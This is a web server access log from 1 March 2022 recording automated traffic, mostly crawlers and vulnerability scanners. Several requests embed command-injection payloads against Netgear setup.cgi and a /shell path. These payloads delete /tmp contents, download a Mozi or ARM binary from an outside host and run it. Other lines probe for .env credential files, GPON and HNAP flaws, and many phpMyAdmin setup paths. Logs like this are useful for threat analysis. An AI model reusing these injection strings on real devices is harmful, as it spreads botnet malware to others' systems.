170.130.187.54 - - [01/Mar/2022:01:40:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "https://gdnplus.com:Gather Analyze Provide."
120.193.91.212 - - [01/Mar/2022:01:41:54 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 319 "-" "Hello, World"
45.146.165.37 - - [01/Mar/2022:01:42:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
128.14.134.170 - - [01/Mar/2022:01:43:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
128.14.134.170 - - [01/Mar/2022:01:43:10 +0100] "GET /webfig/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
35.86.3.138 - - [01/Mar/2022:01:45:49 +0100] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
45.146.165.37 - - [01/Mar/2022:01:48:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
109.237.103.9 - - [01/Mar/2022:01:59:02 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
171.40.182.97 - - [01/Mar/2022:02:01:19 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 319 "-" "Hello, World"
54.193.205.158 - - [01/Mar/2022:02:01:42 +0100] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
103.41.24.121 - - [01/Mar/2022:02:02:34 +0100] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.41.24.121:55363/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 310 "-" "-"
90.154.80.69 - - [01/Mar/2022:02:10:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
128.14.134.134 - - [01/Mar/2022:02:20:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
128.14.134.134 - - [01/Mar/2022:02:20:56 +0100] "GET /webfig/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
194.31.98.171 - - [01/Mar/2022:02:28:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
194.31.98.171 - - [01/Mar/2022:02:28:04 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
95.245.56.5 - - [01/Mar/2022:02:31:06 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+ http://54.151.27.172/.s4y/arm;sh+/tmp/arm HTTP/1.1" 404 306 "-" "Hello, world"
35.233.62.116 - - [01/Mar/2022:02:32:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.27.1"
45.137.23.152 - - [01/Mar/2022:02:33:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
103.217.123.103 - - [01/Mar/2022:02:34:53 +0100] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.217.123.103:39775/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 310 "-" "-"
162.142.125.222 - - [01/Mar/2022:02:37:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.222 - - [01/Mar/2022:02:37:35 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
34.223.83.148 - - [01/Mar/2022:02:38:00 +0100] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
35.233.62.116 - - [01/Mar/2022:02:43:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.27.1"
35.233.62.116 - - [01/Mar/2022:02:44:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.27.1"
45.137.23.152 - - [01/Mar/2022:02:47:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
38.87.239.58 - - [01/Mar/2022:02:48:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
159.192.142.24 - - [01/Mar/2022:02:51:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
104.140.188.6 - - [01/Mar/2022:02:56:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "https://gdnplus.com:Gather Analyze Provide."
171.127.157.55 - - [01/Mar/2022:03:02:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
109.237.103.123 - - [01/Mar/2022:03:03:54 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
35.85.253.211 - - [01/Mar/2022:03:05:15 +0100] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
209.141.62.127 - - [01/Mar/2022:03:18:03 +0100] "GET http://212.91.246.81:80phpMyAdmin/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:04 +0100] "GET http://212.91.246.81:80phpmyadmin/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:05 +0100] "GET http://212.91.246.81:80pma/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:05 +0100] "GET http://212.91.246.81:80myadmin/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:06 +0100] "GET http://212.91.246.81:80MyAdmin/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:06 +0100] "GET http://212.91.246.81:80PHPMYADMIN/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:07 +0100] "GET http://212.91.246.81:80mysqladmin/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:07 +0100] "GET http://212.91.246.81:80SQL/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:08 +0100] "GET http://212.91.246.81:80phpadmin/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:09 +0100] "GET http://212.91.246.81:80phpm/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:09 +0100] "GET http://212.91.246.81:80phpmyadmin1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:10 +0100] "GET http://212.91.246.81:80phpMyAdmin1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:10 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:11 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:12 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:12 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:13 +0100] "GET http://212.91.246.81:80php-my-admin/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:13 +0100] "GET http://212.91.246.81:80admin/pma/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:14 +0100] "GET http://212.91.246.81:80phpMyAdmin-2/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:14 +0100] "GET http://212.91.246.81:80typo3/phpmyadmin/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:15 +0100] "GET http://212.91.246.81:80web/phpMyAdmin/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:16 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.10.0.0/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:16 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.10.0.1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:17 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:17 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.10.0/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:18 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.10.1.0/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:18 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.10.2.0/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:19 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.11.0.0/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:19 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.11.1.0/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:20 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.11.1.1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:20 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:21 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.11.1-all-languages/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:21 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.2.3/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:22 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.2.6/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:23 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.5.1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:23 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.5.5-rc1config/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:24 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.5.5-rc1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:25 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.5.5-rc2/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:25 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.6.1-pl2/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:26 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.6.1-pl3/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:27 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.6.4-pl3/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:27 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.6.4-pl4/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:28 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.6.4-rc1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:29 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.6.5/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:29 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.6.6/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:30 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.6.9/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:31 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.7.0-beta1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:31 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.7.0-pl1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:32 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.7.0-pl2/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:32 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.7.0-rc1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:33 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.7.5/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:34 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.7.6/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:34 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.7.7/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:35 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:35 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.8.2.3/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:36 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.8.2/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:36 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.8.3/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:37 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.8.4/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:38 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.8.5/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:38 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.8.6/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:39 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.8.7/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:39 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.8.8/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:40 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.8.9/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:41 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.9.0.1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:41 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.9.0.2/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:42 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.9.0-rc1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:42 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.9.0/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:43 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.9.1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:43 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.9.2/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:44 +0100] "GET http://212.91.246.81:80phpmyadmin2/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:44 +0100] "GET http://212.91.246.81:80phpMyAdmin2/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:45 +0100] "GET http://212.91.246.81:80phpmyadmin2/scripts/setup.phpwww.hand.org.hu HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:46 +0100] "GET http://212.91.246.81:80phpMyAdmin-3.0.0.0-all-languages/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:46 +0100] "GET http://212.91.246.81:80phpMyAdmin-3.0.0-rc1-english/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:47 +0100] "GET http://212.91.246.81:80phpMyAdmin-3.0.1.0-english/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:47 +0100] "GET http://212.91.246.81:80phpMyAdmin-3.0.1.0/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:48 +0100] "GET http://212.91.246.81:80phpMyAdmin-3.0.1.1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:48 +0100] "GET http://212.91.246.81:80phpMyAdmin-3.1.0.0-english/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:49 +0100] "GET http://212.91.246.81:80phpMyAdmin-3.1.0.0/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:50 +0100] "GET http://212.91.246.81:80phpMyAdmin-3.1.1.0-all-languages/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:50 +0100] "GET http://212.91.246.81:80phpMyAdmin-3.1.2.0-all-languages/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:51 +0100] "GET http://212.91.246.81:80phpMyAdmin-3.1.2.0-english/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:51 +0100] "GET http://212.91.246.81:80phpMyAdmin-3.1.2.0/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:52 +0100] "GET http://212.91.246.81:80phpMyAdmin-3.4.3.1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:52 +0100] "GET http://212.91.246.81:80phpMyAdmin3/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:53 +0100] "GET http://212.91.246.81:80phpMyadmin/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:54 +0100] "GET http://212.91.246.81:80phpmy/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:54 +0100] "GET http://212.91.246.81:80php/phpmyadmin/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:55 +0100] "GET http://212.91.246.81:80php/phpMyAdmin/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:55 +0100] "GET http://212.91.246.81:80_pma/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:56 +0100] "GET http://212.91.246.81:80sqladmin/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:57 +0100] "GET http://212.91.246.81:80sql/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:57 +0100] "GET http://212.91.246.81:80tools/phpMyAdmin/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:58 +0100] "GET http://212.91.246.81:80webapps/phpmyadmin/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:58 +0100] "GET http://212.91.246.81:80webdb/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.62.127 - - [01/Mar/2022:03:18:59 +0100] "GET http://212.91.246.81:80websql/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
52.53.226.146 - - [01/Mar/2022:03:23:25 +0100] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
45.137.23.152 - - [01/Mar/2022:03:24:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
45.137.23.152 - - [01/Mar/2022:03:26:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
45.137.23.152 - - [01/Mar/2022:03:28:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
34.223.111.61 - - [01/Mar/2022:03:32:08 +0100] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
109.237.103.123 - - [01/Mar/2022:03:37:05 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
128.1.248.42 - - [01/Mar/2022:03:39:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
128.1.248.42 - - [01/Mar/2022:03:39:10 +0100] "GET /webfig/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.137.23.152 - - [01/Mar/2022:03:45:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
109.237.103.123 - - [01/Mar/2022:03:45:34 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
191.97.39.183 - - [01/Mar/2022:03:56:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
109.237.103.123 - - [01/Mar/2022:03:57:23 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
31.210.20.234 - - [01/Mar/2022:03:59:51 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
132.145.39.16 - - [01/Mar/2022:04:00:29 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
132.145.39.16 - - [01/Mar/2022:04:00:32 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.81.8.44 - - [01/Mar/2022:04:08:15 +0100] "GET / HTTP/1.1" 200 1229 "http://212.91.246.89:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
31.210.20.234 - - [01/Mar/2022:04:08:50 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
45.137.23.152 - - [01/Mar/2022:04:10:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
54.219.177.22 - - [01/Mar/2022:04:13:14 +0100] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
45.137.23.152 - - [01/Mar/2022:04:14:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
109.237.103.123 - - [01/Mar/2022:04:15:27 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
31.210.20.234 - - [01/Mar/2022:04:20:33 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
49.7.20.75 - - [01/Mar/2022:04:20:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
167.94.138.119 - - [01/Mar/2022:04:24:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.119 - - [01/Mar/2022:04:24:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.119 - - [01/Mar/2022:04:24:33 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
45.137.23.152 - - [01/Mar/2022:04:24:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
222.186.19.235 - - [01/Mar/2022:04:26:56 +0100] "GET http://fuwu.sogou.com/404/index.html HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.196.2 Safari/532.0"
222.186.19.235 - - [01/Mar/2022:04:26:56 +0100] "\x16\x03\x01" 501 318 "-" "-"
222.186.19.235 - - [01/Mar/2022:04:26:56 +0100] "GET http://fuwu.sogou.com/404/index.html HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_6) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.112 Safari/534.30"
49.7.20.75 - - [01/Mar/2022:04:27:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
109.237.103.123 - - [01/Mar/2022:04:27:24 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
